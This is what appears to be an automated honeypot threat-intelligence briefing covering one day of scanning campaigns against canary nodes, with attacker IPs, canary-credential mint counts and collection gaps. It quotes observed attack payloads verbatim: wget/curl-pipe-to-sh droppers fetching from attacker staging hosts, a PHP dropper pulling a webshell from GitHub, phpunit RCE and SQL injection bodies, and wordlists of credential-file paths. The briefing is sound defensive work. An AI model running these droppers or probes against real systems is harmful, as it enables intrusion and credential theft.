FLUX FLEET — INTEL BRIEFING №17
Period: 2026-09-11 07:32 – 2026-09-12 07:32 UTC (24h digest window, day 16 of operations)
Sources: 2 of 3 honeypot nodes contributing — canary-farm-1 (EU-hot), ai-devbox-1 (EU); control-1 blind (third consecutive sync failure)
Confidence: High on both EU nodes (direct observation; 16-day baseline, every result-tag spike attributed by spot query). Control-1 figures are absent, not zero: the node contributed no data and its digest row is a hole, not a measurement.
The digest window equals the true new window (the previous digest also ran at 07:32 UTC). The +4 h ingest cast still pulls the effective query window open to ~03:32 UTC on 09-11, so №16's tail (85.239.149.72's 05:29 LIBREDTAIL run, 80.94.95.211's 06:53 run and mint, the uptime-prober early rows) reappears in cast-window queries. That tail is overlap and is not recounted as new. All times below are raw log timestamps. Tracebit canary counts use the generator's raw wall-clock trim, which excludes the overlap.
BLUF
METADATA-HUNT returned after its first idle window with two fresh Google Cloud runners and the same 609-path, 460-UA template: 34.32.131.244 ran ai-devbox-1 at 21:44 and minted 25, 136.70.175.146 ran canary-farm-1 at 06:33 and minted 4. Mint volume rebounded from 26 to 75, and canary-farm-1 logged its first mint failures since tracking began — 21 upstream 400 Bad Request rejections, all from the farm runner's /.env burst. OMEGA-SWEEP ran two single-minute censuses: the known 94.154.46.249 (2,100 events, 12 mints) and a first-time operator 94.154.46.246 (1,500 events, 10 mints), so every active IP in the /46 block has now run the census. NIGHTAGENT came back on a seventh Office National des Postes MA address with the dropper's GitHub token byte-identical for a ninth window. The canary funnel stayed closed for a third consecutive window: 75 minted credentials, zero AWS calls, and the /46 hoard plus 80.94.95.211's collection grew. control-1's sync failed a third time (ssh root@100.127.175.34 timed out, re-verified 09-12 after the digest); the differential dataset now has a two-day hole.
Key Judgements
- METADATA-HUNT rotates runner IPs, not the template. 34.32.131.244 (Google LLC, NL) fired 839 events across 609 paths with 458 user agents in 26 seconds, and 136.70.175.146 (Google LLC, US) fired 839 events across 609 paths with 460 user agents in 16 seconds. Both produced exactly 69 template-marker events (
__aws_leak_probe_*,@fstraversals,.mcp.json), both carried the forged AI-crawler UA set (Claude-User, ChatGPT-User, GPTBot, Perplexity-User, TelegramBot, Bytespider, Google-Extended), and the aidev runner reproduced the 25-mint batch shape from №13–№15. The fleet design absorbed the full wordlist again:/.envminted, every@fs/proc/self/environand Vite traversal drew its trap response. (High confidence — per-IP counts, marker counts, and UA inventories fromv_full; the 609-path and 69-marker parity across two independent runners is a template fingerprint, not coincidence.) - The OMEGA /46 pool is a fixed rotation roster, and all of it now mints. 94.154.46.249 returned with a byte-for-byte repeat of its 2026-09-02 run: 2,100 events, 1,042 paths, 107 families, 12 mints, forged
Googlebot/2.1, all inside 13 seconds. First-time operator 94.154.46.246 ran the 743-path, 93-family aidev template with 10 mints. Census operators now cover .245–.249, and the block's cumulative hoard across collectors stands at 20+12+10+10+12+6 mints (.243, .249, .248, .245, .246, .242) with zero observed use of any credential. (High confidence — day-level per-IP history matched against the №2, №12, №14, and №16 rosters.) - LIBREDTAIL-KIT rotated its staging host inside the same /16. Two of the four full-kit runs this window carried a dropper for
https://217.60.103.56/sh, the first appearance of a second staging address after three windows on217.60.195.113. The other two runs still used the original host, and the dropper argument reverted toapache. The 217.60.0.0/16 neighborhood also produced a new single-/.envcollector (217.60.76.167), which is an unverified link at /16 granularity and no more. (Moderate confidence — verbatim dropper bodies frombodyPreviewfor all four runs; the /16 overlap is a hosting observation, not attribution.) - NIGHTAGENT's infrastructure is now a 9-window fingerprint. The seventh operator IP, 160.177.217.115 (Office National des Postes MA), ran the full kit on both EU nodes 44 minutes apart with the identical chain:
<?php echo "NightAgent";?>verification, theraw.githubusercontent.com/nightagents/nightshellGHSAT dropper tokenGHSAT0AAAAAACYWDMT5UQIYLJJSWO5KVDNIZYGPEDA(byte-identical to №9),user=root&pass=wrongform login, and the wp-batch UNION SELECT body. It minted 4 credentials — the campaign's second mint after №13 and №15. (High confidence — bodies compared byte-for-byte against №15; ASN continuity holds across all seven IPs.)
Active Campaigns (day 16 status)
Recurring campaigns carry ⟳ and their registry names. First-seen signatures carry ⚠ NEW. Signatures, not IPs, are the campaign identity.
⟳ METADATA-HUNT (GCP SSRF→IMDS sweeps, forged AI-crawler UAs) — hostile, returned after one idle window, two fresh runners
- Actors: 34.32.131.244 (Google LLC, NL) on ai-devbox-1, 21:44:01–21:44:27 UTC: 839 events, 609 paths, 458 UAs, 12 POSTs, 25 mints at
/.env. 136.70.175.146 (Google LLC, US) on canary-farm-1, 06:33:51–06:34:07 on 09-12: 839 events, 609 paths, 460 UAs, 12 POSTs, 4 mints. Both IPs are new to the record. The №13–№15 runners (34.22.137.199, 34.6.12.67, 35.252.125.133, 136.67.37.69, 34.83.24.21, 104.196.118.131, 34.23.228.150) stayed silent. - TTPs: The runners opened with
/__aws_leak_probe_d349c160__(aidev) and/__aws_leak_probe_edee14a6__(farm, a new first-seen path), then walked/.env[issued],/.aws/credentials,/.azure/credentials,/proc/self/environ, and the@fs/proc/self/environ,@fs/proc/1/environ,@fs/home/ec2-user/.aws/credentials,@fs/etc/passwdVite traversals. The 12 POSTs per runner targeted/graphql,/api/graphql,/fetch,/proxy,/api/preview, and/v1/graphql— SSRF-probe shape, empty bodies. 136.70.175.146's/.envand@fs/.envmint attempts drew 21+8 upstream400 Bad Requestrejections from Tracebit; 34.32.131.244's identical burst minted cleanly. - Assessment: The pause was one window. The runner pool rotates one fresh GCP address per node per run, and the 25-mint batch shape survived the pause unchanged, so the pause reads as scheduling, not an upgrade. Watch whether the next run brings a control-1 runner (the node is blind, so a control runner would be invisible).
⟳ OMEGA-SWEEP (Omegatech census template, forged Googlebot/2.1) — hostile, full /46 roster now minting
- Actors: 94.154.46.249 (Omegatech LTD, US) on canary-farm-1, 13:47:51–13:48:04 UTC: 2,100 events, 1,042 paths, 107 families, 12 mints — a repeat of its 09-02 run to the event count. 94.154.46.246 (same block) on ai-devbox-1, 04:12:49–04:13:01 on 09-12: 1,500 events, 743 paths, 93 families, 10 mints — first appearance as an operator, the exact .245/.248 template. Neither .245, .248, nor the 94.154.43.x pool ran.
- TTPs: Single-minute census, forged
Googlebot/2.1,/.envmint inside the run. The two censuses drove every result-tag spike this window: ai-devbox-1ssh-private-key-error70 = .246 (54) + 34.32.131.244 (16);app-config-python41 = .246 (40) + 1;rails-database-yml24 = .246 (22) + 2;firebase-json27 = 34.32.131.244 (25) + .246 (2). Farm's matching counts sit under its 7-day average and did not cross the spike threshold. - Assessment: Five of the six live /46 addresses (.245–.249 plus .242) have now run the wordlist and all six hold untraced credential hoards. The .249 repeat with an identical event count confirms the census is a fixed artifact, versioned like software. The attribution play stays the same: the hoard is the waiting breakthrough if Tracebit fires.
⟳ LIBREDTAIL-KIT (phpunit RCE + key exfil + shell dropper) — hostile, fourth consecutive window, staging host split
- Actors: Four full-kit runs, one ~49-event/37-phpunit run each, 0 mints: 103.72.65.199 (ai-devbox-1, 17:44:16), 45.43.37.254 (UCLOUD INFORMATION TECHNOLOG, TW; canary-farm-1, 22:48:27), 129.121.128.70 (Oracle Corporation, US; ai-devbox-1, 22:50:51), and overlap repeat 85.239.149.72 (Dedik Services, DE; ai-devbox-1, 05:29 on 09-11 — counted in №16, not new). 194.28.89.218 (ai-devbox-1, 5 events across 15 hours) ran lone
cmd-injection-probeGETs at/admin/config.php— background, not the kit. - TTPs: Chain unchanged:
md5("Hello PHPUnit")-class probes acrosseval-stdin.phppermutations, 2×POST /index.phpwithshell_exec(base64_decode(...)), thenPOST /bin/sh. The dropper bodies, verbatim:(wget --no-check-certificate -qO- https://217.60.195.113/sh || curl -sk https://217.60.195.113/sh) | sh -s apache(103.72.65.199 and the overlap run) and(wget --no-check-certificate -qO- https://217.60.103.56/sh || curl -sk https://217.60.103.56/sh) | sh -s apache(45.43.37.254 and 129.121.128.70). The №15–№16cve_2024_4577.selfrepargument is gone again. - Assessment: Fourth window, now 20 operator IPs across 5 countries, and the staging address split two runs each within one /16 on the same day. The
selfrep/apacheflip-flop continues to read as per-run operator choice. The fleet held: fake webshell 200s, tarpit 302s, zero mints — the kit wants execution, and the traps gave it theater.
⟳ NIGHTAGENT (residential multi-stage kit) — hostile, seventh IP, token still unrotated
- Actors: 160.177.217.115 (Office National des Postes e, MA) on both EU nodes in one session: ai-devbox-1 20:59:41–21:24:37 (172 events), canary-farm-1 21:38:41–21:43:09 (160 events). It is crossnode-reuse's top entry (332 events across both sensors). The №15 IP 160.178.89.73 stayed absent.
- TTPs: Full kit unchanged:
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.phpwith<?php echo "NightAgent";?>, then the dropper body<?php copy('https://raw.githubusercontent.com/nightagents/nightshell/refs/heads/main/night.php?token=GHSAT0AAAAAACYWDMT5UQIYLJJSWO5KVDNIZYGPEDA','night.php');readfile('night.php'); ?>, then/login/withuser=root&pass=wrong, wp-batch multiplex with the UNION SELECTauthor_excludeSQLi body, 10×tomcat-path-bypass-envper node, WHM logins underpython-requests/2.32.5, and rotating Chrome 105–106 forgeries across the census stage. 4 mints (2 per node at/.env). - Assessment: Seven operator IPs over nine active windows, all on Moroccan residential ASNs, with the dropper token unrotated since №9 — a standing rotation with pinned infrastructure. The tarpit and fake webshells absorbed every stage. The token is now the campaign's cheapest blocking action for its real targets: one GitHub revocation kills the dropper for every operator.
⟳ REGISTRY-HUNT (LeakIX weblogic→docker-registry walk) — borderline scanner, steady at 7 IPs
- Actors: 7
l9scanIPs, all DigitalOcean, on both nodes, 20:20–20:41 UTC: 159.65.18.197 (82 events, both nodes, 2 mints — the walk's first double), 165.227.173.41, 167.71.81.114, 207.154.197.113 (ai-devbox-1), 64.23.218.208, 159.89.12.166, 139.59.143.102 (canary-farm-1), 41 events each, 1 mint each otherwise. 328 events, 8 mints total. - TTPs: The 15-step template unchanged (WebLogic console → Confluence → WHM/cPanel →
/v2/internal/...docker-registry stages). GraphQL probes present in the runners' POST sets (/graphql,/api/graphql). The two UA variants remain split by sensor (2.0.632323…aidev,2.0.234313…farm). - Assessment: Identical wave size and per-IP depth to №16. LeakIX stays a report-as-scanner entry: 1 mint per IP, shallow journeys, honest attribution. The first double-mint IP is worth a persistence check next window.
⟳ SS-NET TOOLING (.env-variant walk, mint collector) — hostile, standing, ran twice in one cast window
- Actors: 80.94.95.211 (SS-Net, RO), ai-devbox-1: 102 events, 49 paths. Two runs sit inside the cast window: the 06:53 09-11 run (overlap, counted in №16) and a 02:32 09-12 run under an iPhone Safari/5.1 forgery. 2 mints in the cast window, 1 new-window; 12 all-time mints, zero observed use. The daily cadence is now exactly 51 events with 1 mint on each of the last five days.
- TTPs: The standard
.env-variant census; result sequence still matches 213.209.159.175's wordlist. - Assessment: Tenth window in eleven. The fixed 51-event rhythm is a scheduled job, not an operator session. The hoard (8 in the 6-day Tracebit window) stays hostile-held inventory.
⟳ CREDSWEEP (.env-variant + credential-file census) — hostile, Feo Prest operator returned, new TechTies collector
- Actors: 213.209.159.175 (Feo Prest SRL, DE) on canary-farm-1, 23:01:48–23:01:56 UTC: 114 events, 112 paths, 16 families, 1 mint at
/.env, blocklisted ipsum:3+firehol2. Its №16 partner .154 stayed absent. New this window: 91.92.47.27 (TechTies Inc., NL) on canary-farm-1, two runs 18:55 and 20:13: 88 events, 56 paths, 15 families, 2 mints, forgedMozilla/5.0 (SS; Linux x86_64)…Chrome/139plus a Safari iOS variant. - TTPs: The Feo Prest run is the standard
.envcensus (/backend/.env,/api/.env,/sendgrid.env,/admin/.env,/phpinfo.php,/app_dev.php/_profiler/open,/appsettings.json). 91.92.47.27 ran a vendor-credential-file wordlist:/.DS_Store,/.aws/config,/.aws/credentials,/.aws/s3/secrets.yaml,/.cargo/credentials,/.boto,/.cache/huggingface/token,/.azure/accessTokens.json,/.cargo/credentials.toml— the AI/vendor token families the OMEGA wordlist also carries. - Assessment: The Feo Prest /24 has now produced census runs in four windows across two nodes. 91.92.47.27 shares the 91.92.47.201 SS-NET sibling's /24 and its result shape; treat it as the third standing collector on that wordlist family until a shared signature proves or breaks the link.
⚠ NEW: ENV-FANOUT (DigitalOcean /-prefixed .env directory walk) — hostile, second run in four days
- Actors: 167.99.79.44 (DigitalOcean, US) on both EU nodes 18:18–18:21 UTC: 40 events, 20 paths, 3 families, 2 mints per node at
/.env, one Chrome/81 forgery. First seen 2026-09-08 with 8 mints in the same 20-path shape; the blocklist now reads 12 all-time mints across two runs, zero use. - TTPs: A compact directory-prefix fanout:
/.env[issued] →/env.bak,/laravel/.env,/storage/.env,/admin/.env,/application/.env,/src/.env,/local/.env,/public/.env,/app/.env,/backend/.env,/old/.env,/core/.env,/apps/.env,/protected/.env,/blog/.env,/www/.env,/api/.env,/crm/.env— the same 20 paths on both nodes and on both runs, withenv-production200s throughout and tarpit 302s on two paths. - Assessment: The digest's new
c8e0534a08e8cluster is this actor. A repeated single-IP, single-wordlist, dual-node mint run qualifies as a campaign under the registry's promotion rule. Its 12 untraced mints make it a small but real hoard; the Chrome/81 forgery is its fingerprint.
⟳ WP-LOGIN-BRUTE (distributed credential brute) — hostile, background noise
- Actors: 99 credential POSTs from 29 IPs (canary-farm-1 60/18, ai-devbox-1 39/13), forged browser UAs, whole-window spread. The
wp-login-probe/wp-login-credentialscluster (81 events, 27 IPs, fleet-wide signaturee6e6f15a77e8) is this traffic. - Assessment: 100 → 149 → 52 → 99. The 200-pair alarm stays armed.
Standing actors (persistence check)
- Uptime-prober set (benign-shape): 89.248.172.33 (IP Volume inc, NL) 126 events across 25 hours, 93.174.93.12 100 events, 89.248.172.11 4 — all
/-only.ipsum:1on .33. Eleventh consecutive window. - 16.5.0.236 (
Hello WorldUA) — 37 events on both EU nodes, tarpit cycling. Benign-shape, twelfth window. - 3.129.187.38 (
visionheight.com/scan) — 19 events (9/+ 9/robots.txttarpit + 1), fifth consecutive window. - 185.218.86.25 / 195.182.16.23 / 89.42.231.200 —
/-only probers returned after idle windows: 39, 14, and 6 events. Benign-shape. - 193.24.123.123 (watch) — tarpit-only traffic ramping 1 → 3 → 29 → 37 → 12 events per day since 09-08, forged Chrome UAs, no credential paths, no mints. Unattributed; a census-scale run promotes it.
- 74.7.228.40 (benign) —
OAI-SearchBot/1.4; robots.txton a fixed 9-event cadence every one to two days; first appearance in this dataset's record as a standalone honest crawler. - 143.110.197.188 (watch) — lone
/robots.txt9-event tarpit burst under a forged Chrome/83 UA, first seen. One event; no follow-up yet. - 172.237.88.137 (Akamai Connected Cloud, SG; ipsum:1) — 168 events in 25 seconds at 07:46, 121 paths, opportunistic multi-product scan (GeoServer, Ivanti, Cisco VPN, ColdFusion, Next.js,
/sdkPOST), 1 POST with no body, 0 mints. Same path list as 172.232.253.221's 08-29 control run — a shared commodity scanner. Borderline; report, don't promote. - New single-
/.envcollectors: 217.60.76.167 (ai-devbox-1, 1 mint at 04:57 on 09-12, forged Firefox/4.0, 1 event all-time — and a 217.60.0.0/16 neighbor of both LIBREDTAIL staging hosts) and 43.228.157.228 (ai-devbox-1, 1 mint at 06:12, Chrome/81 forgery, 2 events all-time — a same-/24 sibling of watched 43.228.157.68). - Benign research scanners present: 16
zgrab/0.xIPs (19 events), 4 CensysInspect IPs (10 events), 5 Palo Alto Cortex Xpanse IPs (9 events). The 03:15 first-seen stamp cluster on ai-devbox-1 belongs to 172.237.88.137's 07:46 run and the /46 census, not to Censys this cycle — the sync-arrival quirk again. - Absent this window: XMLRPC-BRUTE entirely (0 xmlrpc events — both the №14
ac14tbobpband №16spdoperators silent); CRUSADER-SWEEP (fourth consecutive idle); MEVSPACE-GITWALK (no 109.205.211.201, no Hetzner IPv6); 45.148.10.238 (fourth); 91.245.74.31 (fourth); 43.228.157.68 (second); the 45.156.128.x WP-ENUM cluster; MALWARE-DICT unverifiable (control-1 blind); 204.76.203.x unverifiable; 147.90.209.220; 182.8.249.108; 94.154.43.146/.180; 35.233.85.98; 207.175.64.93; 160.178.89.73 (NIGHTAGENT idle); the №13–№16 METADATA runners; 193.32.204.199; the №16 Nmap NSE scanners.
Canary credentials
Summary
No canary credentials were used in AWS during the window. Fleet sensors minted 75 credentials to 19 collector IPs; none reached AWS.
Mint → use funnel
| Metric | Count |
|---|---|
| Credentials minted (fleet, window) | 75 |
| Distinct collector IPs | 19 |
| Credentials used in AWS (alerts) | 0 |
| Credentials stolen, no observed AWS use in window | 75 |
Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):
| Theft IP | Sensor | Mints (window) | Creds used in AWS | Use IPs | Operations | Mint history (6d) |
|---|---|---|---|---|---|---|
34.32.131.244 |
ai-devbox-1 | 25 | 0 | 0 | — | 25 mints since 2026-09-11 21:44 |
94.154.46.249 |
canary-farm-1 | 12 | 0 | 0 | — | 12 mints since 2026-09-11 13:47 |
94.154.46.246 |
ai-devbox-1 | 10 | 0 | 0 | — | 10 mints since 2026-09-12 04:12 |
136.70.175.146 |
canary-farm-1 | 4 | 0 | 0 | — | 4 mints since 2026-09-12 06:33 |
160.177.217.115 |
ai-devbox-1 | 2 | 0 | 0 | — | 4 mints since 2026-09-11 21:02 |
160.177.217.115 |
canary-farm-1 | 2 | 0 | 0 | — | 4 mints since 2026-09-11 21:02 |
167.99.79.44 |
ai-devbox-1 | 2 | 0 | 0 | — | 12 mints since 2026-09-08 19:11 |
167.99.79.44 |
canary-farm-1 | 2 | 0 | 0 | — | 12 mints since 2026-09-08 19:11 |
91.92.47.27 |
canary-farm-1 | 2 | 0 | 0 | — | 2 mints since 2026-09-11 18:55 |
139.59.143.102 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-09 21:48 |
159.65.18.197 |
ai-devbox-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-06 20:35 |
159.65.18.197 |
canary-farm-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-06 20:35 |
159.89.12.166 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-06 20:30 |
165.227.173.41 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-11 20:20 |
167.71.81.114 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-09 22:04 |
176.65.148.71 |
ai-devbox-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-06 18:50 |
176.65.148.71 |
canary-farm-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-06 18:50 |
207.154.197.113 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-07 20:28 |
213.209.159.175 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-10 22:43 |
217.60.76.167 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-12 04:57 |
43.228.157.228 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-12 06:12 |
64.23.218.208 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-11 20:36 |
80.94.95.211 |
ai-devbox-1 | 1 | 0 | 0 | — | 8 mints since 2026-09-06 08:36 |
Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):
104.196.118.131: 25 mints, 2026-09-06 03:25 → 2026-09-06 03:25136.67.37.69: 25 mints, 2026-09-08 19:55 → 2026-09-08 19:5534.22.137.199: 25 mints, 2026-09-07 17:26 → 2026-09-07 17:2634.32.131.244: 25 mints, 2026-09-11 21:44 → 2026-09-11 21:4434.6.12.67: 25 mints, 2026-09-09 09:09 → 2026-09-09 09:0934.83.24.21: 25 mints, 2026-09-07 05:10 → 2026-09-07 05:1035.252.125.133: 25 mints, 2026-09-08 18:51 → 2026-09-08 18:52136.85.124.29: 17 mints, 2026-09-07 15:44 → 2026-09-07 15:44167.99.79.44: 12 mints, 2026-09-08 19:11 → 2026-09-11 18:1994.154.46.247: 12 mints, 2026-09-06 19:02 → 2026-09-06 19:0294.154.46.249: 12 mints, 2026-09-11 13:47 → 2026-09-11 13:4845.148.10.238: 10 mints, 2026-09-05 20:43 → 2026-09-07 12:1994.154.46.245: 10 mints, 2026-09-10 16:25 → 2026-09-10 16:2594.154.46.246: 10 mints, 2026-09-12 04:12 → 2026-09-12 04:1394.154.46.248: 10 mints, 2026-09-08 07:51 → 2026-09-08 07:51136.85.12.249: 8 mints, 2026-09-05 09:28 → 2026-09-05 09:2880.94.95.211: 8 mints, 2026-09-06 08:36 → 2026-09-12 02:3241.142.109.20: 6 mints, 2026-09-05 05:09 → 2026-09-05 05:4794.154.46.242: 6 mints, 2026-09-09 16:38 → 2026-09-09 16:39102.220.161.87: 4 mints, 2026-09-07 23:07 → 2026-09-09 13:44136.70.175.146: 4 mints, 2026-09-12 06:33 → 2026-09-12 06:33136.70.70.191: 4 mints, 2026-09-09 03:53 → 2026-09-09 03:53139.59.136.184: 4 mints, 2026-09-05 20:41 → 2026-09-10 20:35142.93.129.190: 4 mints, 2026-09-07 20:16 → 2026-09-10 20:23160.177.217.115: 4 mints, 2026-09-11 21:02 → 2026-09-11 21:43176.65.144.71: 4 mints, 2026-09-09 21:56 → 2026-09-09 21:56185.141.119.179: 4 mints, 2026-09-05 10:17 → 2026-09-05 10:2631.57.219.158: 4 mints, 2026-09-06 13:11 → 2026-09-06 13:23159.65.18.197: 3 mints, 2026-09-06 20:35 → 2026-09-11 20:40176.65.148.71: 3 mints, 2026-09-06 18:50 → 2026-09-12 06:16209.97.180.8: 3 mints, 2026-09-05 20:42 → 2026-09-09 14:3541.140.11.235: 3 mints, 2026-09-08 06:34 → 2026-09-08 06:4584.21.173.161: 3 mints, 2026-09-06 22:19 → 2026-09-07 13:0091.245.74.31: 3 mints, 2026-09-05 09:48 → 2026-09-06 21:30
Canary-use attribution (briefing prose)
The funnel stayed closed for the third consecutive window: 75 mints to 19 collectors, zero AWS calls, against an all-time total of 951 credentials to 251 collector IPs. The rebound from 26 follows directly from METADATA-HUNT's return — the two runner batches contributed 29 mints, and the two OMEGA censuses added 22. The largest single hoards remain the six 25-mint runner batches, now joined by 34.32.131.244. The 159.26.110.179 GetCallerIdentity success (№14) remains the funnel's only non-Converse use and its only success. Three near-funnel events keep the "no observed use" qualifier mandatory: №14's uses trailed the mint by hours, the 35-collector hoard keeps growing (94.154.46.x now at 12+10+10+12+6 across .242–.249), and the first 21 mint failures this cycle show the upstream API rate-limiting /.env bursts — a failure mode that could mask partial mints in future windows. 217.60.76.167's single mint is the first from the 217.60.0.0/16 block that hosts both LIBREDTAIL staging addresses; the link is geographic, not proven.
Fleet Observations
- Canary economics: True-window mints 75 to 19 collectors (digest table reads 76 cast-window issued rows: farm 28, aidev 48, control 0; the 1-row difference is №16-overlap from the +4 h cast), all
["aws"]. First mint failures since tracking began: 29 canary-farm-1 events returned400 Bad Requestfrom Tracebit — 21/.envmints plus 8@fs/*/.envVite-traversal mints, all from 136.70.175.146's 06:33 burst. Root cause: upstream rejection during a 13-second mint burst (21 requests inside the runner's/.envfanout), consistent with rate limiting, not key malformation (ai-devbox-1's identical 25-mint burst from 34.32.131.244 succeeded 9 hours earlier). ai-devbox-1 logged 0 failures. - XFF forgery: 0 multi-entry chains, 0 empty-clientIp rows (373 requests carried single-entry XFF) — fifteenth consecutive clean day post-fix.
- TLS/attribution posture: True-window https: canary-farm-1 192 events (375 Host-header hits on
sso.rightabouteverything.show, 3,856 on the bare IP), ai-devbox-1 193 (382 oninference.fapthropic.com, 3,095 on the bare IP). Control stayed certless by design.vmi3177282.contaboserver.netcarried 178 aidev events — the Contabo reverse-DNS host, unattributed beyond the volume. - Volume: Digest window 7,747 events across contributing nodes (farm 4,185 −17% / aidev 3,562 −83% / control 0). True-window spot counts run slightly higher (farm 4,245 / aidev 3,668) on the cast. Farm's −17% is the absence of №16's 8,139-event xmlrpc burst, not a fleet change. Aidev's −83% against a 21,209 7-day average is baseline distortion — the mean carries the 50,112-event CRUSADER class-B day. Every ≥50-event hour attributed: farm 13:00 (2,108) = the .249 census; aidev 04:00 on 09-12 (1,521) = the .246 census (1,500); aidev 21:00 (1,019) = 34.32.131.244 (839) + 160.177.217.115 + the LeakIX wave; farm 06:00 on 09-12 (856) = 136.70.175.146 (839); farm 20:00 (208) and aidev 20:00 (191) = the LeakIX wave.
- Control discovery velocity: Unmeasurable — third consecutive sync failure. The 09-10 row (481 events, 35 IPs) and everything after are holes. Verified at 2026-09-12 after the digest:
ssh root@100.127.175.34times out. The ramp dataset stands at 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98 → 99 → 108 → 120 → 110 → 78 → blind → blind → blind. - Result-tag spikes: All four attributed. ai-devbox-1
app-config-python41 (4.2×) = .246 census (40) + 1;firebase-json27 (3.2×) = 34.32.131.244 (25) + .246 (2);rails-database-yml24 (4.2×) = .246 (22) + 2;ssh-private-key-error70 (3.3×) = .246 (54) + 34.32.131.244 (16). No unexplained spikes. - First-seen inventories: The 20 new ai-devbox-1 paths stamped 03:15 belong to 172.237.88.137's 07:46 scan and the .246 census (sync-arrival quirk); the 10 new canary-farm-1 UAs stamped 03:31 are 136.70.175.146's crawler-forgery rotation, and
/__aws_leak_probe_edee14a6__is its IMDS-probe marker. New hostile path inventory:/wsman,/api/sonicos/auth,/.crypto(SonicWall-family probes, 1 event each, scattered IPs — watch for a VPN-focused wave). - Digest quirks (all re-checked this run): control-byte-stripped copy needed for UTF-8 reads; +4 h timestamp cast (overlap tail from №16 excluded from new counts); single-writer DuckDB lock (all queries sequential); sync-arrival first-seen stamps; window boundary aligned (both digests run at 07:32 UTC). New quirk observed: upstream mint rejections (
tracebit-http-error) now appear as 404-status rows inv_fullwitherror='Bad Request'— count mint failures from these rows, not fromresult='issued'absence. - Infrastructure: no fleet-side changes this cycle. control-1's third consecutive sync failure is the one operational exception.
Gaps / Next Collection
- control-1 recovery. Three consecutive failures. Before the next run, check reachability (
ssh root@100.127.175.34 true); if SSH answers, the only permitted action issystemctl start flux-log-sync.service. A fourth failure leaves the fresh-IP differential unobserved for a third of the dataset's life and hides any control-only campaign (MALWARE-DICT's loop, NIGHTAGENT's historic control runs) indefinitely. - The funnel's fourth zero. Three consecutive zero-use windows against 168 minted credentials. Check the Tracebit pull window against the full history of the 35+ persistent collectors (uses can trail the flux cutoff — the №14 precedent) and re-check the 159.26.110.179 credentials outside the flux window. A fourth zero makes the hoard/resale hypothesis the lead explanation outright.
- The mint-failure mode. 136.70.175.146's 21×400 burst is the first evidence of upstream rate limiting. Next runner burst, count
tracebit-http-errorrows before trusting the mint total — a partially rejected batch undercounts the hoard. - METADATA-HUNT runner rotation. Two new GCP runners this window after one idle. Check next cycle for a third runner batch and a control-1 appearance (invisible while the node is blind), and watch whether the 25-mint batch shape holds or splits like the farm 4-mint variant did.
- OMEGA-SWEEP pool completion. Every live /46 IP has now run the census. Watch for a seventh operator outside the block (№15's escape pattern) and for the first Tracebit alert against the 70-credential combined hoard.
- ENV-FANOUT and the 91.92.47.27 wordlist. Both are second-run or first-run collectors with 12+ mints between them. A third 167.99.79.44 run or a shared-path sighting with 91.92.47.201/80.94.95.211 merges the wordlist families into one tracked commodity.
Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-12.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (94.154.46.249), plus ad-hoc v_full queries (METADATA runner attribution and POST extraction, OMEGA census attribution and spike joins, LIBREDTAIL roster and dropper decode with staging-host split, NIGHTAGENT seventh-IP kit and token check, LeakIX wave roster, ENV-FANOUT shape and history, spike attribution per tag, standing-actor persistence, 217.60.0.0/16 history, mint-failure root cause) and the Tracebit canary-section generator.